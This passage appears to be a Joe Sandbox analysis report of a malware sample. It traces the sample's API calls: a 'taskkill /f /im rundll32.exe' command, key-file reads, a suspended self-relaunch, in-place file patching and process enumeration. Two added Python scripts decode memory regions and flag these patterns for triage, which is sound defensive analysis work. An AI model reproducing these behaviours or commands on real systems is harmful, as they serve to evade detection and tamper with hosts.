  • Part of subcall function 1000A44E: ??2@YAPAXI@Z.MSVCRT(00000128), ref: 1000A512
  • Part of subcall function 1000A44E: Process32First.KERNEL32(?,00000000), ref: 1000A521
  • Part of subcall function 1000A44E: _strcmpi.MSVCRT ref: 1000A531
  • Part of subcall function 1000A44E: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 1000A564
• WinExec.KERNEL32(taskkill /f /im rundll32.exe,00000000), ref: 100081FE
Strings
Memory Dump Source
• Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
Yara matches
Similarity
• API ID: ??2@??3@AddressExecFirstLibraryLoadProcProcess32_strcmpi
• String ID: .$2$3$d$e$e$l$l$n$r$taskkill /f /im rundll32.exe$u$x
APIs
  • Part of subcall function 0041249A: LoadLibraryA.KERNEL32(?,?), ref: 00412543
  • Part of subcall function 0041249A: GetProcAddress.KERNEL32(00000000), ref: 0041254A
  • Part of subcall function 0041249A: ??2@YAPAXI@Z.MSVCRT(00000128), ref: 0041255E
  • Part of subcall function 0041249A: _strcmpi.MSVCRT ref: 0041257D
  • Part of subcall function 0041249A: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 004125B0
• WinExec.KERNEL32(10013DC8,00000000), ref: 0041024A
Strings
Memory Dump Source
• Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
Yara matches
Similarity
• API ID: ??2@??3@AddressExecLibraryLoadProc_strcmpi
• String ID: .$2$3$d$e$e$l$l$n$r$u$x
APIs
• GetSystemDirectoryA.KERNEL32(?,00000104), ref: 10006875
• strcat.MSVCRT(?,10012A68), ref: 10006887
• strcat.MSVCRT(?,Default,?,10012A68), ref: 10006898
• strcat.MSVCRT(?,.key,?,Default,?,10012A68), ref: 100068A9
• CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 100068C8
• GetFileSize.KERNEL32(00000000,00000000), ref: 100068D9
• ??2@YAPAXI@Z.MSVCRT(00000000), ref: 100068E2
• ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 100068F4
• ??3@YAXPAX@Z.MSVCRT(00000000), ref: 10006914
• CloseHandle.KERNEL32(?), ref: 1000691E
Strings
Memory Dump Source
• Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
Yara matches
Similarity
• API ID: Filestrcat$??2@??3@CloseCreateDirectoryHandleReadSizeSystem
• String ID: .key$Default
APIs
  • Part of subcall function 0040F177: memset.MSVCRT ref: 0040F1A3
  • Part of subcall function 0040F177: memset.MSVCRT ref: 0040F1B5
  • Part of subcall function 0040F177: wsprintfA.USER32 ref: 0040F25B
• lstrcpy.KERNEL32(?,10013484), ref: 0040F33A
Strings
Memory Dump Source
• Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                     • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: memset$lstrcpywsprintf
                                                                    • String ID: C$Default$G$c$e$n$n$o$o$p$r$t$u
                                                                    • API String ID: 993010004-148360246
                                                                    • Opcode ID: 7b9f11020c9a38ff0127635762f09269e694f158993faf986e64edac5c2f7f63
                                                                    • Instruction ID: 6b1b36c9d0c7228d9668808e8d8d478e66986f18db6631c765765848bca5d0a4
                                                                    • Opcode Fuzzy Hash: 7b9f11020c9a38ff0127635762f09269e694f158993faf986e64edac5c2f7f63
                                                                    • Instruction Fuzzy Hash: 36010410D082D8F9EB1297A9C808BAEBFB55F52758F0480D8D5847A286C7BA6718C776
                                                                    APIs
                                                                    • __EH_prolog.LIBCMT ref: 10001C12
                                                                    • memcmp.MSVCRT(?,?,00000006,00000000,00000000,00019000), ref: 10001C3F
                                                                    • memcpy.MSVCRT(?,00000000,00000006,00000000,?,00000006,00000000,00000000,00019000), ref: 10001CA8
                                                                    • memcmp.MSVCRT(00000000,?,00000006,?,00000000,00000006,00000000,?,00000006,00000000,00000000,00019000), ref: 10001CB7
                                                                    • _CxxThrowException.MSVCRT(?,10010AE0), ref: 10001CD3
                                                                    • memcpy.MSVCRT(00000006,00000000,00000004,00000006,00000000,?,00000006,00000000,00000000,00019000), ref: 10001CEB
                                                                    • ??2@YAPAXI@Z.MSVCRT(-0000000C,?,00000004,?,00000004,00000006,00000004,?,00000006,?,?,00000006,00000000,?,00000006,00000000), ref: 10001D4D
                                                                    • ??2@YAPAXI@Z.MSVCRT(?,?,00000004,?,00000004,00000006,00000004,?,00000006,?,?,00000006,00000000,?,00000006,00000000), ref: 10001D59
                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,-0000000C,?,00000004,?,00000004,00000006,00000004,?,00000006,?,?,00000006,00000000,?), ref: 10001DB1
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,00000000,-0000000C,?,00000004,?,00000004,00000006,00000004,?,00000006,?,?,00000006,00000000,?), ref: 10001DBA
                                                                    • _CxxThrowException.MSVCRT(?,10010AE0), ref: 10001DD7
                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000004,?,00000004,00000006,00000004,?,00000006,?,?,00000006,00000000,?,00000006,00000000), ref: 10001DE6
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000004,?,00000004,00000006,00000004,?,00000006,?,?,00000006,00000000,?,00000006,00000000), ref: 10001DF4
                                                                      • Part of subcall function 10001E6D: ??2@YAPAXI@Z.MSVCRT(10007ED6,759183C0,00000000,00000001,10007ED6,000000C8,0000022C), ref: 10001E8E
                                                                      • Part of subcall function 10001E6D: memcpy.MSVCRT(00000000,000000C8,10007ED6,759183C0,00000000,00000001,10007ED6,000000C8,0000022C), ref: 10001EA6
                                                                      • Part of subcall function 10001E6D: ??3@YAXPAX@Z.MSVCRT(0000022C,0000022C,10007ED6,10007ED6,00000004,10007ED6,00000004,000000C8,00000004,?,00000006,759183C0,00000000,00000001), ref: 10001EFD
                                                                      • Part of subcall function 10001E6D: ??2@YAPAXI@Z.MSVCRT(00000001,0000022C,0000022C,10007ED6,10007ED6,00000004,10007ED6,00000004,000000C8,00000004,?,00000006,759183C0,00000000,00000001), ref: 10001F05
                                                                      • Part of subcall function 10001E6D: memcpy.MSVCRT(00000000,000000C8,00000001,00000001,0000022C,0000022C,10007ED6,10007ED6,00000004,10007ED6,00000004,000000C8,00000004,?,00000006,759183C0), ref: 10001F14
                                                                      • Part of subcall function 10001E6D: ??3@YAXPAX@Z.MSVCRT(00000000,0000022C,00000001,00000004,000000C8,00000004,?,00000006,759183C0,00000000,00000001), ref: 10001F3C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                     • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                     • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmp
                                                                     • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ??3@$??2@memcpy$ExceptionThrowmemcmp$H_prolog
                                                                    • String ID:
                                                                    • API String ID: 1493374972-0
                                                                    • Opcode ID: 4b1fdf1ea01d5ff0d7712f43459c6e805e43086e5ce5c99aec9822d9619c269a
                                                                    • Instruction ID: 7afd09c710f940f47f73cce2c9c93733a61324b861e6b9946357802098d20c5d
                                                                    • Opcode Fuzzy Hash: 4b1fdf1ea01d5ff0d7712f43459c6e805e43086e5ce5c99aec9822d9619c269a
                                                                    • Instruction Fuzzy Hash: 7A518475A0010AABEF04DFA4CC42EEE77B9EF486D0F50412AF505A7186DB74EA45CB91
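The "Memory Dump Source" names above carry the page protection and memory type of every dumped region, which is how the two modules in this run differ: the main image at 0x400000 has code regions that are both executable and writable, while the module at 0x10000000 has its executable region in private rather than image-backed memory. The decoder below is an added example written for this report, not Joe Sandbox tooling. The dotted field layout and the field names are an assumption inferred from the names on this page (the fifth field lines up with the Win32 PAGE_* constants, the seventh with MEM_IMAGE / MEM_PRIVATE / MEM_MAPPED); the remaining fields are carried through without interpretation. The sample list is a constructed subset of the names printed above.

```python
"""Decode Joe Sandbox .sdmp memory-dump names and flag regions worth a second look.

Added example for this report, not Joe Sandbox code. The field layout is an
assumption inferred from the names on this page; PAGE_* and MEM_* values are the
documented Win32 constants.
"""
import re
from dataclasses import dataclass

PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
MEM_TYPE = {0x01000000: "MEM_IMAGE", 0x00020000: "MEM_PRIVATE", 0x00040000: "MEM_MAPPED"}
EXECUTABLE = {0x10, 0x20, 0x40, 0x80}
WRITABLE_CODE = {0x40, 0x80}

# Assumed layout: pid.stage.dump_id.base.protect.state.type.extra.sdmp
SDMP_RE = re.compile(
    r"^(?P<pid>[0-9a-f]{8})\.(?P<stage>[0-9a-f]{8})\.(?P<dump_id>\d+)\."
    r"(?P<base>[0-9a-f]{16})\.(?P<protect>[0-9a-f]{8})\.(?P<state>[0-9a-f]{8})\."
    r"(?P<mtype>[0-9a-f]{8})\.(?P<extra>[0-9a-f]{8})\.sdmp$",
    re.IGNORECASE,
)


@dataclass(frozen=True)
class DumpRegion:
    name: str
    pid: int
    base: int
    protect: int
    mtype: int

    @property
    def protect_name(self) -> str:
        return PAGE_PROTECT.get(self.protect, f"0x{self.protect:08x}")

    @property
    def mtype_name(self) -> str:
        return MEM_TYPE.get(self.mtype, f"0x{self.mtype:08x}")


def parse_sdmp(name: str) -> DumpRegion:
    """Split one .sdmp file name into its decoded fields; raises on anything else."""
    m = SDMP_RE.match(name.strip())
    if m is None:
        raise ValueError(f"not a Joe Sandbox .sdmp name: {name!r}")
    return DumpRegion(name=name, pid=int(m["pid"], 16), base=int(m["base"], 16),
                      protect=int(m["protect"], 16), mtype=int(m["mtype"], 16))


def flag_regions(names):
    """Return (base, reason, protection, type) tuples for two region classes:
    code that is also writable (what is left after section rights are changed
    at run time), and executable memory that is MEM_PRIVATE rather than
    MEM_IMAGE (code the loader never mapped from a file on disk)."""
    findings = []
    for r in (parse_sdmp(n) for n in names):
        if r.protect in WRITABLE_CODE:
            findings.append((r.base, "writable code", r.protect_name, r.mtype_name))
        elif r.protect in EXECUTABLE and r.mtype_name == "MEM_PRIVATE":
            findings.append((r.base, "executable private memory", r.protect_name, r.mtype_name))
    return findings


# Constructed input: a subset of the names listed on this page (main image at
# 0x400000 and the module at 0x10000000).
SAMPLE_NAMES = [
    "00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmp",
    "00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmp",
    "00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmp",
    "00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmp",
    "00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmp",
    "00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp",
    "00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmp",
]

if __name__ == "__main__":
    for base, reason, prot, mtype in flag_regions(SAMPLE_NAMES):
        print(f"0x{base:08x}  {reason:26s} {prot:24s} {mtype}")
```

Run against the full list above, the decoder flags every 0x40 / 0x80 region of the main image and only the 0x10001000 region of the second module; a region that decodes to an unknown protection or type value is printed as its raw hex rather than dropped, so a layout change in a future report shows up instead of being silently misread.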
                                                                    APIs
                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0040DDA3
                                                                    • GetShortPathNameA.KERNEL32(?,?,00000104), ref: 0040DDC0
                                                                    • GetEnvironmentVariableA.KERNEL32(10012D24,?,00000104), ref: 0040DDDB
                                                                    • lstrcpy.KERNEL32(?,10012D18), ref: 0040DDF5
                                                                    • GetCurrentProcess.KERNEL32(00000100), ref: 0040DE59
                                                                    • GetCurrentThread.KERNEL32 ref: 0040DE6A
                                                                    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,0000000C,00000000,00000000,00000044,?), ref: 0040DE90
                                                                    • ResumeThread.KERNEL32(?), ref: 0040DEAB
                                                                    • GetCurrentProcess.KERNEL32(00000020), ref: 0040DEB8
                                                                    • GetCurrentThread.KERNEL32 ref: 0040DEC2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                     • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Current$ProcessThread$Name$CreateEnvironmentFileModulePathResumeShortVariablelstrcpy
                                                                    • String ID: D
                                                                    • API String ID: 474313888-2746444292
                                                                    • Opcode ID: 6d6a3810a3ff98d1a818007ac0a4a6722265b29b39479b547dd4eb1410b57027
                                                                    • Instruction ID: b4ef4a4e28cb620e9a2440b99920a1b6c97c05269481ab4fc3d544fd7c4eb548
                                                                    • Opcode Fuzzy Hash: 6d6a3810a3ff98d1a818007ac0a4a6722265b29b39479b547dd4eb1410b57027
                                                                    • Instruction Fuzzy Hash: 8031FDB2D0062CFEEB109BE0CC89EDB7B7CEB44351F104566F605E6194DB759A44CB61
                                                                    APIs
                                                                    • __EH_prolog.LIBCMT ref: 00410649
                                                                    • memset.MSVCRT ref: 00410675
                                                                    • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000003,00000080,00000000,?,0000005C,?), ref: 004106B0
                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 004106C1
                                                                    • SetFilePointer.KERNEL32(?,00000040,00000000,00000000), ref: 004106D3
                                                                    • WriteFile.KERNEL32(?,?,00002710,?,00000000), ref: 004106F1
                                                                    • LoadLibraryA.KERNEL32(10013DF0,10013E00), ref: 00410707
                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041070E
                                                                    • Sleep.KERNEL32(00000000), ref: 00410717
                                                                    • CloseHandle.KERNEL32(?), ref: 00410732
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                     • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: File$AddressCloseCreateH_prologHandleLibraryLoadPointerProcSizeSleepWritememset
                                                                    • String ID: KERNEL32.dll
                                                                    • API String ID: 1496718816-254546324
                                                                    • Opcode ID: d95cf6921070a3d0606e8b335ca360e22b21236b34dd118d265a5ad6dbb74d0a
                                                                    • Instruction ID: 0a6a8ba30645a08d825a5043dedfeafda3bbcea105ecb3b58f0c096334c68bc5
                                                                    • Opcode Fuzzy Hash: d95cf6921070a3d0606e8b335ca360e22b21236b34dd118d265a5ad6dbb74d0a
                                                                    • Instruction Fuzzy Hash: 77316B7290021CBFEB11AFA4DD89EEF7B7DEB05398F004126F516A6191CB749E84CB64
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(kernel32.dll), ref: 1000A394
                                                                    • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 1000A3A8
                                                                    • GetProcAddress.KERNEL32(00000000,Process32First), ref: 1000A3B2
                                                                    • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 1000A3BD
                                                                    • lstrcmpiA.KERNEL32(?,?), ref: 1000A3F5
                                                                    • CloseHandle.KERNEL32(00000000), ref: 1000A414
                                                                    • FreeLibrary.KERNEL32(00000000), ref: 1000A41F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                     • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                     • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmp
                                                                     • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AddressProc$Library$CloseFreeHandleLoadlstrcmpi
                                                                    • String ID: CreateToolhelp32Snapshot$Process32First$Process32Next$kernel32.dll
                                                                    • API String ID: 1314729832-4285911020
                                                                    • Opcode ID: 1597d119bdd4340409934fc035f21a73f1f8bbb5134f4146e10c90239e8cd71b
                                                                    • Instruction ID: 5bc2e2efb2ebdc37442e72abf7ad3c4ede563df5b677971c453c906c9641fef3
                                                                    • Opcode Fuzzy Hash: 1597d119bdd4340409934fc035f21a73f1f8bbb5134f4146e10c90239e8cd71b
                                                                    • Instruction Fuzzy Hash: 6F117035901228BBEB11DBA5CC8CFEEBFB8EF45791F004155F904E6144DB78EA84CA60
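Three of the function records above carry API sequences that an analyst would want flagged without reading every argument list by hand: the function at 0040DDA3 calls CreateProcessA with dwCreationFlags 0000000C (CREATE_SUSPENDED | DETACHED_PROCESS) and then ResumeThread; the function at 00410649 opens an existing file with GENERIC_WRITE, seeks to offset 0x40 and writes 0x2710 bytes; and the function at 1000A394 resolves CreateToolhelp32Snapshot, Process32First and Process32Next through GetProcAddress and then compares names with lstrcmpiA. The script below is an added example written for this report, not Joe Sandbox or sample code. It parses the "<api>.<module>(<args>), ref: <addr>" lines in the exact form printed on this page and applies three hand-written rules; the rule names are this example's own, the Win32 constants are the documented values, and the sample text is a constructed copy of lines from the three records named above.

```python
"""Triage the per-function API traces of a Joe Sandbox report.

Added example, not Joe Sandbox or sample code. Parses '<api>.<module>(<args>), ref: <addr>'
lines as printed in the report and checks each function record against three rules
whose names are this example's own.
"""
import re

LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\S+?)\.(?P<mod>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
HEX_RE = re.compile(r"^-?[0-9A-Fa-f]{8}$")

# Documented Win32 values.
CREATE_SUSPENDED = 0x00000004
GENERIC_WRITE = 0x40000000
OPEN_EXISTING = 3
TOOLHELP = {"CreateToolhelp32Snapshot", "Process32First", "Process32Next"}


def parse_args(raw):
    """8-hex-digit tokens become ints (as the report prints them); '?' and names stay str."""
    out = []
    for tok in (raw or "").split(","):
        tok = tok.strip()
        if tok:
            out.append(int(tok, 16) & 0xFFFFFFFF if HEX_RE.match(tok) else tok)
    return out


def parse_records(text):
    """Blank-line separated blocks of bullet lines -> one call list per function."""
    records, current = [], []
    for line in text.splitlines():
        if not line.strip():
            if current:
                records.append(current)
                current = []
            continue
        m = LINE_RE.match(line)
        if m:
            current.append({"api": m["api"], "mod": m["mod"], "args": parse_args(m["args"]),
                            "ref": int(m["ref"], 16), "sub": m["sub"]})
    if current:
        records.append(current)
    return records


def arg(call, i):
    return call["args"][i] if i < len(call["args"]) else None


def triage(calls):
    """Apply the three rules to one function's call list and return the findings."""
    names = [c["api"] for c in calls]
    findings = []
    for i, c in enumerate(calls):
        later = calls[i + 1:]
        if c["api"].startswith("CreateProcess"):
            flags = arg(c, 5)  # dwCreationFlags is the 6th CreateProcess parameter
            if isinstance(flags, int) and flags & CREATE_SUSPENDED \
                    and any(x["api"] == "ResumeThread" for x in later):
                findings.append({"rule": "suspended_relaunch", "ref": c["ref"],
                                 "detail": f"dwCreationFlags=0x{flags:08x}"})
        elif c["api"].startswith("CreateFile"):
            access, disposition = arg(c, 1), arg(c, 4)  # dwDesiredAccess, dwCreationDisposition
            seek = next((x for x in later if x["api"] == "SetFilePointer"), None)
            write = next((x for x in later if x["api"] == "WriteFile"), None)
            if isinstance(access, int) and access & GENERIC_WRITE \
                    and disposition == OPEN_EXISTING and seek and write:
                findings.append({"rule": "in_place_file_patch", "ref": c["ref"],
                                 "detail": f"offset=0x{arg(seek, 1):x} length={arg(write, 2)}"})
    resolved = {arg(c, 1) for c in calls if c["api"] == "GetProcAddress"}
    compare = next((n for n in names if n.startswith("lstrcmp")), None)
    if TOOLHELP <= resolved and compare:
        findings.append({"rule": "dynamic_toolhelp", "ref": calls[0]["ref"],
                         "detail": f"Toolhelp32 resolved at run time, names compared with {compare}"})
    return findings


# Constructed input: lines copied from three of the function records on this page.
SAMPLE_RECORDS = """
• GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0040DDA3
• GetShortPathNameA.KERNEL32(?,?,00000104), ref: 0040DDC0
• CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,0000000C,00000000,00000000,00000044,?), ref: 0040DE90
• ResumeThread.KERNEL32(?), ref: 0040DEAB

• CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000003,00000080,00000000,?,0000005C,?), ref: 004106B0
• GetFileSize.KERNEL32(00000000,00000000), ref: 004106C1
• SetFilePointer.KERNEL32(?,00000040,00000000,00000000), ref: 004106D3
• WriteFile.KERNEL32(?,?,00002710,?,00000000), ref: 004106F1
• CloseHandle.KERNEL32(?), ref: 00410732

• LoadLibraryA.KERNEL32(kernel32.dll), ref: 1000A394
• GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 1000A3A8
• GetProcAddress.KERNEL32(00000000,Process32First), ref: 1000A3B2
• GetProcAddress.KERNEL32(00000000,Process32Next), ref: 1000A3BD
• lstrcmpiA.KERNEL32(?,?), ref: 1000A3F5
"""

if __name__ == "__main__":
    for calls in parse_records(SAMPLE_RECORDS):
        for f in triage(calls):
            print(f"{f['ref']:08X}  {f['rule']:22s} {f['detail']}")
```

The argument positions the rules read are the documented parameter slots, so a false positive from an unrelated CreateFile or CreateProcess call needs the same access, disposition and flag values, not merely the same API name; a record that matches none of the rules simply yields an empty list.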
                                                                    APIs
                                                                    • __EH_prolog.LIBCMT ref: 100018F2
                                                                    • WSAStartup.WS2_32(00000202,?), ref: 10001943
                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 1000194E
                                                                    • memcpy.MSVCRT(?,?,00000006), ref: 10001980
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                     • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                     • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmp
                                                                     • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateEventH_prologStartupmemcpy
                                                                    • String ID: A$G$Q$Rsjshd fzfgkqcm$f$f$s
                                                                    • API String ID: 2412012656-3315494269
                                                                    • Opcode ID: 104a1d0a91fd37328b0f045415fccb69181a38f9aa0c3305a1845c4683449357
                                                                    • Instruction ID: 552ae35b8cdd0f66e1ae7642cf2388ae71e75a36ebd57896a2e2d44db462b0ec
